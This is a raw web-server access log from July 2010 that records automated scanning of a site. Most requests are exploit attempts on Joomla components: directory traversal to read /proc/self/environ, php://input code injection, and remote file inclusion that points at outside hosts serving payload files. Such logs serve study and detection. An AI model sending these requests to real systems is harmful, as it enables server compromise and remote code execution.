76.242.100.234 - - [26/Jul/2010:15:55:42 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
67.218.116.169 - - [26/Jul/2010:15:58:19 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
125.141.91.138 - - [26/Jul/2010:16:10:00 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:10:00 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 325 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:10:01 +0200] "GET /logs/access_log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:10:11 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 325 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:10:11 +0200] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
125.141.91.138 - - [26/Jul/2010:16:10:11 +0200] "GET /logs/access_log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:16:11:49 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.165.213.8 - - [26/Jul/2010:16:12:01 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:16:12:01 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:16:12:01 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
69.12.114.5 - - [26/Jul/2010:16:12:47 +0200] "GET /logs///////?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 806 "-" "libwww-perl/5.805"
69.12.114.5 - - [26/Jul/2010:16:12:47 +0200] "GET ///////?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 670 "-" "libwww-perl/5.805"
77.222.34.35 - - [26/Jul/2010:16:13:41 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:13:41 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:16:13:41 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:13:52 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:13:52 +0200] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:16:13:52 +0200] "GET /logs/access_log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:16:19:56 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:22:32 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:22:32 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:22:33 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
207.46.195.105 - - [26/Jul/2010:16:26:27 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.131.106.8 - - [26/Jul/2010:16:26:56 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.6 - - [26/Jul/2010:16:27:00 +0200] "GET /?C=M%3BO=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
174.121.240.147 - - [26/Jul/2010:16:28:11 +0200] "GET //logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-" "libwww-perl/5.810"
207.46.195.105 - - [26/Jul/2010:16:32:56 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "POST /logs/access_log/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "GET /logs/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:16:36:04 +0200] "POST /logs/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
114.108.151.149 - - [26/Jul/2010:16:39:15 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:16:41:26 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
77.87.207.144 - - [26/Jul/2010:16:48:58 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [es]"
174.121.240.147 - - [26/Jul/2010:16:54:45 +0200] "GET /logs/access_log//logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:16:54:45 +0200] "GET //logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:16:54:45 +0200] "GET /logs//logs/access_100612.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-" "libwww-perl/5.810"
114.108.151.149 - - [26/Jul/2010:17:01:20 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:01:21 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:01:21 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
188.72.70.56 - - [26/Jul/2010:17:07:21 +0200] "GET /logs/access_log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:17:07:21 +0200] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:17:07:21 +0200] "GET //index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:17:08:06 +0200] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:17:08:06 +0200] "GET //index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:17:08:06 +0200] "GET /logs/access_log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
187.45.193.159 - - [26/Jul/2010:17:10:04 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:04 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:04 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:05 +0200] "POST /logs/access_log/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
187.45.193.159 - - [26/Jul/2010:17:10:05 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:05 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:06 +0200] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:06 +0200] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
187.45.193.159 - - [26/Jul/2010:17:10:06 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:06 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:07 +0200] "GET /logs/index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:17:10:07 +0200] "POST /logs/index.php?option=com_properties&controller=php://input HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.44.82.61 - - [26/Jul/2010:17:11:14 +0200] "GET /logs/e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.44.82.61 - - [26/Jul/2010:17:11:14 +0200] "GET /e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
217.16.18.219 - - [26/Jul/2010:17:12:54 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
188.72.70.56 - - [26/Jul/2010:17:17:54 +0200] "GET /logs/access_log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:17:19:12 +0200] "GET /logs/access_log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:21:53 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:21:53 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 353 "-" "Mozilla/5.0"
77.222.34.35 - - [26/Jul/2010:17:21:53 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 342 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:22:07 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:22:07 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 353 "-" "Mozilla/5.0"
91.206.218.32 - - [26/Jul/2010:17:22:07 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 342 "-" "Mozilla/5.0"
188.165.213.8 - - [26/Jul/2010:17:23:42 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:17:23:42 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:17:23:42 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
217.16.18.219 - - [26/Jul/2010:17:26:26 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:17:26:26 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:17:26:26 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:30:06 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:30:07 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:30:08 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:44:57 +0200] "GET /logs/?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:44:58 +0200] "GET /?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:44:58 +0200] "GET /logs/?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:44:58 +0200] "GET /logs/?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:44:59 +0200] "GET /?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:44:59 +0200] "GET /?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:45:22 +0200] "GET /logs/?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:45:22 +0200] "GET /?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:46:49 +0200] "GET /logs/access_log/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
202.29.92.6 - - [26/Jul/2010:17:46:49 +0200] "GET /?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 559 "-" "Mozilla/5.0"
202.29.92.6 - - [26/Jul/2010:17:46:49 +0200] "GET /logs/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 796 "-" "Mozilla/5.0"
202.29.92.6 - - [26/Jul/2010:17:47:47 +0200] "GET /?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 559 "-" "Mozilla/5.0"
202.29.92.6 - - [26/Jul/2010:17:47:47 +0200] "GET /logs/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 796 "-" "Mozilla/5.0"
202.29.92.6 - - [26/Jul/2010:17:47:47 +0200] "GET /logs/access_log/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
114.108.151.149 - - [26/Jul/2010:17:49:03 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:49:04 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:17:49:05 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
